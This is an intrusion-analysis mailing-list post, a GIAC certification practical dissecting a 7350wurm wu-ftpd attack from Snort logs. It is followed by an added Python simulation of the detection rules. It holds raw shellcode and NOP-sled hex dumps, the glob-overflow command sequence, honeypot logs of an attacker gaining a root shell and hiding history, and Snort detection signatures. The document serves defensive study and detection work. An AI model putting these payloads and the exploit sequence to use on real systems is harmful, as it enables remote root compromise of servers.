
List:       intrusions
Subject:    Re: LOGS: GIAC GCIA Version 3.3 Practical Detect#2 (Rietveld)
From:       "Ronny Rietveld" <ronny () plcrietveld ! demon ! nl>
Date:       2002-11-26 15:04:30


Oliver,

After spending more time on this detect I have to admit there was a lot more to it. Initially I concentrated on the globbing commands, but the answer is in the exploit code of the first packet. I have included more details on the padding x30's and the xeb x0c / x90 noops. Hope I have correctly interpreted the information, as this coding is not one of my hobbies.. yet ;-)

Regards, 
Ronny


[**] SHELLCODE x86 EB OC NOOP [**]
07/07-00:51:37.964488 134.126.133.162:2103 -> 46.5.180.133:21 
TCP TTL:51 TOS:0x0 ID:10390 IpLen:20 DgmLen:560 DF
***AP*** Seq: 0xBB7E1B4C Ack: 0x8599DDFF Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 30355649 6749585 
43 57 44 20 30 30 30 30 30 30 30 30 30 30 30 30 CWD 000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
30 30 30 30 F0 FC 40 31 07 08 98 5F 08 08 EB 0C 0000..@1..._....
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C ................
EB 0C EB 0C 90 90 90 90 90 90 90 90 90 90 90 90 ................
31 DB 43 B8 0B 74 51 0B 2D 01 01 01 01 50 89 E1 1.C..tQ.-....P..
6A 04 58 89 C2 CD 80 EB 0E 31 DB F7 E3 FE CA 59 j.X......1.....Y
6A 03 58 CD 80 EB 05 E8 ED 0A CA 59 6A 03 58 CD j.X........Yj.X.
80 EB 05 E8 ED FF FF FF FF FF FF 0A ............


[**] FTP wu-ftp bad file completion attempt { [**]
07/07-00:51:38.004488 134.126.133.162:2103 -> 46.5.180.133:21
TCP TTL:51 TOS:0x0 ID:10391 IpLen:20 DgmLen:68 DF
***AP*** Seq: 0xBB7E1D48 Ack: 0x8599E008 Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 30355653 6749588 
43 57 44 20 7E 2F 7B 2E 2C 2E 2C 2E 2C 2E 7D 0A CWD ~/{.,.,.,.}.

[**] FTP wu-ftp bad file completion attempt { [**]
07/07-00:51:38.164488 134.126.133.162:2103 -> 46.5.180.133:21
TCP TTL:51 TOS:0x0 ID:10399 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0xBB7E1DB0 Ack: 0x8599E13F Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 30355670 6749605 
FD A5 43 57 44 20 7E 7B 0A CWD ~{.

< Cut for brevity; see Appendix Detect 1>

(1) Source of Trace:
The source is the log file (2002.6.6), downloaded from http://www.incidents.org/logs/Raw. This file was generated by the Snort NIDS with an unknown ruleset.

(2) Detect was generated by:
This detect is generated by Snort 1.9.0 in NIDS mode, using default signature files. The snort.conf file was changed to include all rule files.

Snort rule applying to the first packet (shellcode.rules):
alert ip $EXTERNAL_NET any -> $HOME_NET $SHELLCODE_PORTS (msg:"SHELLCODE x86 EB OC NOOP"; content:"|EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C EB 0C|"; classtype:shellcode-detect; sid:1424; rev:4;)

Snort rule applying to the second and third packet (ftp.rules):
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP wu-ftp bad file completion attempt {"; flow:to_server,established; content:"~"; content:"{"; reference:cve,CVE-2001-0550; reference:cve,CAN-2001-0886; reference:bugtraq,3581; classtype:misc-attack; sid:1378; rev:9;)

(3) Probability the source address was spoofed:
Very low. The TCP three-way handshake was completed before the attacker could launch this attack. This also implies that an FTP daemon is running on all victims, while there is no evidence that reconnaissance took place from the source address in the two months preceding this attack.

(4) Description of attack:
The attacker sends a series of packets to each victim. Each of the victims is targeted two times. When you put all packets in chronological order, you can see there is a clear pattern in the time delay and in the increase of the identification number (ID).

      Victim        Time      Delay     Identification numbers
      46.5.180.133  00:51:37  00:00:00  10390, 10391, 10399
      46.5.180.151  00:51:59  00:00:22  43646, 43467, 43655
      46.5.180.153  00:52:21  00:00:22  42562, 42563, 42571
      46.5.180.135  00:52:44  00:00:23  64492, 64493, 64501
      46.5.180.153  00:53:06  00:00:22  32920, 32921, 32929
      46.5.180.151  00:53:28  00:00:22  24913, 24914, 24922
      46.5.180.134  00:53:50  00:00:22  56491, 56492, 56500
      46.5.180.133  00:54:12  00:00:22  65102, 65103, 65111
      46.5.180.135  00:54:34  00:00:22  29029, 29030, 29038
      46.5.180.134  00:54:56  00:00:22  48729, 48730, 48738



I believe the attacker used the 7350wurm code to attack wuftp on x86 platforms: the 0xEB 0x0C jump-based NOOPs, 0x90 NOOPs and the exploit code from the first packet are the first part of phase two of 7350wurm. Note that the trailing 0xCA 0x59 0x6A 0x03 0x58 0x80 0xEB 0x05 0xE8 0xED appears twice in the first packet, but is defined only once in the 7350wurm code.

  a. The command 'CWD ~/{.,.,.,.}' from the second packet is the second part of phase two of 7350wurm and is sent back-to-back with the first packet. This explains why the identification number increases by one.
  b. The command 'CWD ~{' from the third packet is part of phase three of 7350wurm and clears the path for the real exploit code. Between this command and the former, 7350wurm sends four CWD and three RNFR commands. This explains the increase of the identification number by eight.

There are multiple versions floating around the Internet. This detect is referenced with version 0.2.2, downloaded from Packet Storm Security. The latest version can be downloaded from Teso Security.

(5) Attack mechanism:
In his write-up Rating the Enemy: "How to identify the enemy", Toby Miller describes an attack on his RedHat 7.2 honey pot, logged one month before this attack. Although he does not mention the exploit code used, it is obviously a trace of 7350wurm. Excerpts from Toby Miller's write-up are shown indented.

The attacker logs in (using Ethereal):
220 alligator12 FTP server (Version wu-2.6.1-18) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.

In auto mode, the exploit code is able to recognize WU-FTP versions 2.4.2 to 2.6.1 running on Caldera, Debian, Immunix, Mandrake, RedHat, Slackware and SuSe Linux. With the -t option the attacker can select the version of choice from a list.

Username ftp and password mozilla@ are both defaults. With the -p option the attacker can set an arbitrary password. With the -u option the attacker should be able to set a username, but from the 7350wurm code it appears the username is fixed to 'h0ra'.

Attacker begins trying to rename: 
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name

Phase one of the 7350wurm code: According to the 7350wurm code: 'Fill all small memory gaps in wuftpd malloc space. Do this by sending RNFR (ReName FRom) requests, which cause a memory leak in wuftpd.' Although I have not found any reference to a memory leak vulnerability in the RNFR command of WU-FTP, the RNFR should be immediately followed by RNTO (ReName TO). Since these are not sent by the attacker, they may hold small portions of memory.

Attacker begins to glob:

CWD 0000000000000000000000000000(cut for publication)

CWD ~/{.,.,.,.}

250 CWD command successful.

CWD .

250 CWD command successful.

RNFR ././././././././.

350 File exists, ready for destination name

CWD 735073

550 735073: No such file or directory.

CWD 73507

550 73507: No such file or directory.

CWD 7350é

550 7350é: No such file or directory.

RNFR .

350 File exists, ready for destination name

RNFR ./././././././.

350 File exists, ready for destination name

  Phase two of the 7350wurm code: The two commands in red are packets one and two from this detect. The first packet exploits a buffer overflow vulnerability. The first part of the datagram is padded with 0x30 bytes. This may be done to evade IDS detection, but is not a NOOP and may cause a crash when used to overflow a buffer.

  NOOPs are used as a placeholder to put exploit code in a position where it is executed in case of a buffer overflow. There are a number of bytes or combinations of bytes that can act as NOOPs. All have in common that when executed the contents of memory will not change, hence the name NO-OPeration. In this datagram the NOOPs start with repetitive 0xEB 0x0C bytes (marked blue). When the return address hits 0xEB, it instructs the host to jump with an offset of 0x0C bytes. There it could hit the next jump-based NOOP, or hit the 0x90-padded area (marked green). These common NOOPs instruct the host to do nothing and slide to the next byte. Without this area there is a good chance the last jump-based NOOP will end up at some point in the exploit code (marked red).

  According to the 7350wurm code this exploit code includes three commands:
  write (1, "\nsP\n", 4) 
  read (0, ncode, 0xff)
  jmp ncode

  In other words it writes 'sP' (0x7350), reads the returned bytes and jumps to that point. This may look insignificant, but these two characters will ultimately be decisive whether the real exploit code is sent to the victim.

  The second packet is a CWD command using globbing with an unusual pattern. Although it looks similar, it is not compliant with CVE-2001-0550 or CVE-2001-0886. The first paper does not include '/', while the second paper explicitly states the glob pattern ends with '{'. Unfortunately I was unable to find more information on this specific command.

Attacker gets what he wants:

CWD ~{

sP

3Û÷ã°F3ÉÍ?jT<Ü°'±íÍ?°=Í?R±_h/Dâø<Ü°=Í?XjTj(XÍ?j

XTRhn/shh//bi?ãRS?áÍ?áÍ?unset HISTFILE;id;uname -a;

uid=0(root) gid=0(root) groups=50(ftp)

Linux alligator12 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown 

  Phase three of the 7350wurm code: Packet three from this detect pops up. This is the well-known exploit of the glibc library, which allows the attacker to run the real exploit code. CVE-2001-0550 and CVE-2001-0886 cover this vulnerability. The 7350wurm code expects 'sP' to be returned by the globbing exploit or the root attempt will fail. Since 7350wurm knows where 'sP' was located in memory, it is sufficient to send the real exploit code without padding with NOOPs. The exploit code includes three parts: it sets the real and effective user for the current process to 0 (root) with setreuid(0,0), breaks chroot and executes /bin/sh to start the root shell. The last command strings sent by 7350wurm are 'unset HISTFILE' to hide traces of the attack from the history, 'id' to return the user id, group id and group membership, and 'uname -a' to get information on the hostname, Linux kernel version and date, and processor architecture. After a successful exploit the attacker 'owns' the victim and will most likely install a backdoor for future access.

  To conclude this section: the 7350wurm code does not appear to have the ability to scan networks for vulnerable hosts. With the 22-second intervals in mind, it is quite certain the attacker used an external script to launch the attack.

(6) Correlations:
A search on the Internet on the source IP address (134.126.133.162) or its host name (ip133-162.lab.jmu.edu) does not return more information on this attack or other attacks by this host. The source IP address is registered in the DShield.org IP Info database. A total of 90080 records against 90078 targets are held against this source IP address, all dated 06-07-2002. (Information retrieved 24-10-2002)

A lookup in the ARIN Whois database shows that the source IP address belongs to a class-B network registered to James Madison University. Information from the Internet Storm Center shows that the 134.126.0.0/16 network has a total of 812 registered hosts, operating from 94 sub-networks. A total of 99992 records against 94263 targets are held against this network. (Information retrieved 20-11-2002)

The 7350wurm code used to reference the various parts of the attack can be downloaded from Packet Storm Security. According to the information on this site the 7350wurm code was found abandoned on a honey pot.
Packet Storm Security, '0205-exploits/7350wurm.c'
URL: http://packetstormsecurity.org/0205-exploits/7350wurm.c (11-20-2002)

In reply to a post on SecurityFocus, Gerardo Richarte describes the function of the first exploit code, the real exploit code and the link of the 'sP' string with both.
Richarte, Gerardo. 'Re: Strange version of a standard WUFTP overflow' SecurityFocus (07-02-2002)
URL: http://archives.neohapsis.com/archives/sf/honeypots/2002-q3/0000.html (11-20-2002)

Miller, Toby. 'Rating the Enemy: "How to identify the enemy"'
URL: http://www.incidents.org/detect/rating.html (11-10-2002)


(7) Evidence of active targeting:
Yes. None of the logs show reconnaissance from this attacker. However, it is possible that the attacker has done reconnaissance but did not use OOS packets or trip any threshold of Snort's preprocessors. Nevertheless, the attacker picked five victims that run an FTP daemon.

(8) Severity:
      Area                     Rate  Explanation
      Criticality              5     One of the victims is the main FTP server.
      Lethality                5     When successful, the attacker can remotely execute arbitrary code.
      System countermeasures   1     The log does not rule out the possibility the victims were compromised.
      Network countermeasures  1     The attacker successfully made connections with the five victims.

Severity = (criticality + lethality) - (sys. countermeasures + net. countermeasures)
Severity = (5 + 5) - (1 + 1) = 8

(9) Defensive recommendation:
Update WU-FTP daemons to version 2.6.2 or higher. It is likely the attacker will change files or install a backdoor for future access. To counter this, a regular checkup on critical files with a checksum-based tool like Tripwire should be considered. Public FTP servers should be considered insecure and be placed in the DMZ of a firewall. Internal hosts should not trust public FTP servers. TCP wrapper or similar software can provide additional security on non-public FTP servers. Disabling anonymous access will prevent 'anonymous' attacks at the penalty of sending clear-text passwords over an unsafe public network.

Snort did not pick up all packets of the 7350wurm attack, or logged a more general alert. This is bad, since assumptions have to be made to classify this attack. Add this rule to Snort to correctly detect the first distinctive packet from 7350wurm version 0.2.2 and log the next hundred packets from the source IP address. This should give the analyst the opportunity to conclude whether or not the root attempt was successful. Please note that the rule has to be included before the EB OC NOOP rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP 7350wurm v0.2.2"; flow:to_server,established,nostream; content:"CWD "; nocase; content:"|31 DB 43 B8 0B 74 51 0B 2D 01 01 01 01 50 89 E1|"; dsize: > 200; tag: host, 100, packets, src; classtype: attempted-admin; sid:1000001; rev:1;)

(10) Multiple choice test question:
What is the intention of someone when sending this command: CWD ~{
A: List contents of current directory.
B: Execute arbitrary commands
C: Information gathering
D: Cause a denial of service
Correct answer: B 

CVE-2001-0550: 'wu-ftpd 2.6.1 allows remote attackers to execute arbitrary commands via a "~{" argument to commands such as CWD, which is not properly handled by the glob function (ftpglob).'
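
Added example, not part of Ronny's post and not Snort code: a small Python stand-in for the content checks of the three rules quoted in the post (sid 1424, sid 1378 and the proposed 'FTP 7350wurm v0.2.2' rule), replayed over payloads rebuilt from the post's hex dumps, to show why the rule order and the tag: option matter for catching the first distinctive packet and the follow-up traffic. The evaluator is a simplification of Snort 1.9's first-match alerting and tag logging, and the benign packet from 10.0.0.5 is constructed.

```python
"""Minimal first-match evaluator for the content checks of the three Snort rules in
the post (sid 1424, sid 1378, proposed 7350wurm rule). Python stand-in, not Snort."""

EB0C_SLED = bytes.fromhex("EB0C") * 8                           # sid 1424 content
WURM_STUB = bytes.fromhex("31DB43B80B74510B2D010101015089E1")  # proposed rule content

def match_wurm_v022(payload: bytes) -> bool:
    """content:"CWD " nocase; content:|31 DB ... 89 E1|; dsize:>200."""
    return len(payload) > 200 and b"cwd " in payload.lower() and WURM_STUB in payload

def match_sid1424(payload: bytes) -> bool:
    """Eight consecutive EB 0C jump-based NOOPs anywhere in the payload."""
    return EB0C_SLED in payload

def match_sid1378(payload: bytes) -> bool:
    """content:"~"; content:"{"; unmodified contents match independently."""
    return b"~" in payload and b"{" in payload

# (msg, matcher, packets to tag from the source afterwards), in rule order: Snort 1.9
# alerts on the first rule that matches, which is why the post says the 7350wurm
# rule has to be listed before the EB 0C NOOP rule.
RULES = [
    ("FTP 7350wurm v0.2.2", match_wurm_v022, 100),
    ("SHELLCODE x86 EB OC NOOP", match_sid1424, 0),
    ("FTP wu-ftp bad file completion attempt {", match_sid1378, 0),
]

def evaluate(packets, rules=RULES):
    """packets: (src_ip, payload) tuples to port 21 in capture order. Returns
    (src_ip, msg) events; 'TAGGED' stands in for tag:host,100,packets,src logging
    of follow-up packets from a source that already triggered the rule."""
    events, tagged = [], {}                      # tagged: src -> packets left to log
    for src, payload in packets:
        hit = next(((msg, tag) for msg, fn, tag in rules if fn(payload)), None)
        if hit:
            events.append((src, hit[0]))         # first matching rule wins
            if hit[1]:
                tagged[src] = hit[1]             # start tagging this source
                continue
        if tagged.get(src, 0) > 0:
            tagged[src] -= 1
            events.append((src, "TAGGED"))
    return events

# Constructed payloads rebuilt from the post's hex dumps (packet 1 keeps its layout:
# "CWD ", 256 x 0x30, address bytes, 82 x EB 0C, 12 x 0x90, then the stub bytes).
PKT1 = (b"CWD " + b"0" * 256 + bytes.fromhex("F0FC40310708985F0808")
        + bytes.fromhex("EB0C") * 82 + b"\x90" * 12 + WURM_STUB
        + bytes.fromhex("6A045889C2CD80EB0E31DBF7E3FECA59"))
PKT2 = b"CWD ~/{.,.,.,.}\n"
PKT3 = b"\xfd\xa5CWD ~{\n"
ATTACKER = "134.126.133.162"
BENIGN = ("10.0.0.5", b"CWD pub\r\n")            # constructed, must not alert
TRACE = [(ATTACKER, PKT1), (ATTACKER, PKT2), (ATTACKER, PKT3), BENIGN]
```

Running evaluate(TRACE) with the rules in the post's recommended order yields the 7350wurm alert for packet one followed by tagged packets; with the order reversed, packet one only produces the generic EB OC NOOP alert and nothing is tagged.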



